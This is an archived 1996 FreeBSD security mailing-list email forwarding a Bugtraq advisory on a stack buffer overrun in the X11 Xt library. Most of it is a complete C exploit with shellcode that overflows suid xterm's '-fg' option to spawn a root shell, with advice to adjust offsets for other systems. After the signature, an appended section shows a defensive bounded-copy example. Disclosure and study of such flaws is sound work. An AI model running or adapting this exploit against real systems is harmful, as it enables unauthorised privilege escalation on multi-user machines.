From owner-freebsd-security Sat Aug 24 23:05:24 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id XAA10085 for security-outgoing; Sat, 24 Aug 1996 23:05:24 -0700 (PDT)
Received: from gwydion.hns.st-louis.mo.us (kenth@dialup-34.hunter.com [199.217.148.34]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id XAA10079 for ; Sat, 24 Aug 1996 23:05:18 -0700 (PDT)
Received: (from kenth@localhost) by gwydion.hns.st-louis.mo.us (8.7.5/8.7.3) id BAA22181 for freebsd-security@freebsd.org; Sun, 25 Aug 1996 01:05:20 -0500 (CDT)
From: Kent Hamilton
Message-Id: <199608250605.BAA22181@gwydion.hns.st-louis.mo.us>
Subject: Vulnerability in the Xt library (fwd)
To: freebsd-security@freebsd.org
Date: Sun, 25 Aug 1996 01:05:20 -0500 (CDT)
X-Mailer: ELM [version 2.4 PL24 ME8a]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Thought this might be of interest.

----- Forwarded message from Aleph One -----

>From NETSPACE.ORG!owner-bugtraq@scsgate.scscom.com Sat Aug 24 11:50:51 1996
Sender: NETSPACE.ORG!owner-bugtraq@scsgate.scscom.com
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Approved-By: Aleph One
Message-Id:
Date: Sat, 24 Aug 1996 02:14:24 -0700
Reply-To: Bugtraq List
Sender: Bugtraq List
From: Aleph One
Subject: Vulnerability in the Xt library
X-Cc: xfree86@xfree86.org, jff@x.org, matt@x.org, xbugs@x.org, gildea@x.org
To: Multiple recipients of list BUGTRAQ

There exists at least one vulnerability in the Xt library caused by a buffer overrun that allows arbitrary code to be executed. This vulnerability exists in the Xt library itself. As such, all programs linked with it that are suid root or can be coerced into running as root are vulnerable. The standard example is, of course, suid xterm.

The vulnerability has been confirmed under FreeBSD, Solaris, and as far as we can tell every single other OS running all revisions of X11. There exist a large number of places in the Xt library code where buffers allocated on the stack are handled insecurely, other than the one used in the following exploit. The Xt library is a can of worms.

The original author of this vulnerability is "b0z0 bra1n".

x86 exploit tested under FreeBSD follows. For other x86 operating systems play around with the offset:

/* header names were lost when the list archive was rendered; restored here */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define DEFAULT_OFFSET 0
#define BUFFER_SIZE 1491

long get_esp(void)
{
   __asm__("movl %esp,%eax\n");
}

int main(int argc, char **argv)
{
   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;
   char execshell[] =
      "\xeb\x23"
      "\x5e"
      "\x8d\x1e"
      "\x89\x5e\x0b"
      "\x31\xd2"
      "\x89\x56\x07"
      "\x89\x56\x0f"
      "\x89\x56\x14"
      "\x88\x56\x19"
      "\x31\xc0"
      "\xb0\x3b"
      "\x8d\x4e\x0b"
      "\x89\xca"
      "\x52"
      "\x51"
      "\x53"
      "\x50"
      "\xeb\x18"
      "\xe8\xd8\xff\xff\xff"
      "/bin/sh"
      "\x01\x01\x01\x01"
      "\x02\x02\x02\x02"
      "\x03\x03\x03\x03"
      "\x9a\x04\x04\x04\x04\x07\x04";
   int i, ofs=DEFAULT_OFFSET, bs=BUFFER_SIZE;

   if(argc>1) ofs=atoi(argv[1]);
   if(argc>2) bs=atoi(argv[2]);

   printf("Using offset of esp + %d (%x)\nBuffer size %d\n", ofs, get_esp()+ofs, bs);

   buff = malloc(4096);
   if(!buff) {
      printf("can't allocate memory\n");
      exit(0);
   }
   ptr = buff;
   memset(ptr, 0x90, bs-strlen(execshell));
   ptr += bs-strlen(execshell);
   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];
   addr_ptr = (long *)ptr;
   for(i=0;i < (8/4);i++)
      *(addr_ptr++) = get_esp() + ofs;
   ptr = (char *)addr_ptr;
   *ptr = 0;
   execl("/usr/X11R6/bin/xterm", "xterm", "-fg", buff, NULL);
}

Aleph One / aleph1@underground.org
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01

----- End of forwarded message from Aleph One -----

--
Kent Hamilton
Play: KentH@HNS.St-Louis.MO.US    NIC Handle: KH91
URL: http://www.icon-stl.net/~khamilto/
Blessed Be....
Work: KHamilton@Hunter.COM
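The advisory's point is the coding pattern, not the one xterm option: a caller-supplied string copied into a fixed-size buffer on the stack with no length check. The following is an added example, not code from the Bugtraq post, from Xt, or from xterm; it puts that unsafe pattern beside a bounded replacement so the defect and its fix can be seen side by side. Every function name, the OPT_BUF size and the constructed 1491-byte test value are assumptions made for the illustration.

```c
/* Added example, not part of the Bugtraq post or of the Xt library.
 * It shows the pattern the advisory describes (an option value copied
 * into a fixed-size stack buffer without a length check) beside a
 * bounded version.  All names and sizes here are hypothetical. */
#include <stdio.h>
#include <string.h>

#define OPT_BUF 64   /* hypothetical fixed buffer size */

/* Unsafe pattern: strcpy into a fixed stack buffer.  A value longer
 * than OPT_BUF runs past the buffer into the rest of the stack frame,
 * which is the class of defect the advisory attributes to Xt. */
size_t copy_option_unsafe(const char *value)
{
    char buf[OPT_BUF];
    strcpy(buf, value);           /* no bound on the copy */
    return strlen(buf);
}

/* Bounded version: refuse values that do not fit (terminator included)
 * rather than truncating silently.  Returns 0 on success, -1 if rejected. */
int copy_option_checked(const char *value, char *out, size_t outlen)
{
    size_t n = strlen(value);
    if (outlen == 0 || n >= outlen)
        return -1;
    memcpy(out, value, n + 1);    /* copies the NUL as well */
    return 0;
}

/* Probe helper: copy into a local OPT_BUF-byte buffer while telling the
 * checked copy it only has `limit` bytes, so the boundary can be tested.
 * Returns copy_option_checked's result, or -2 if limit exceeds the buffer. */
int try_copy(const char *value, size_t limit)
{
    char out[OPT_BUF];
    if (limit > sizeof out)
        return -2;
    return copy_option_checked(value, out, limit);
}

/* Constructed input: a value of the size the advisory's exploit passes
 * to "-fg" (1491 bytes, here plain 'A's).  Returns 1 if the checked
 * copy rejects it, 0 otherwise. */
int checked_rejects_long_value(void)
{
    char value[1492];
    memset(value, 'A', sizeof value - 1);
    value[sizeof value - 1] = '\0';
    return try_copy(value, OPT_BUF) == -1;
}

int main(void)
{
    printf("unsafe copy of short value, length: %zu\n", copy_option_unsafe("red"));
    printf("checked, short value: %d\n", try_copy("red", OPT_BUF));
    printf("checked, exactly full (no room for NUL): %d\n", try_copy("0123456789", 10));
    printf("checked, one byte spare: %d\n", try_copy("012345678", 10));
    printf("checked, 1491-byte value rejected: %d\n", checked_rejects_long_value());
    return 0;
}
```

The check uses `n >= outlen` rather than `n > outlen` so that a value which fills the buffer exactly, leaving no room for the terminator, is also refused; silently truncating instead would hide the problem from the caller.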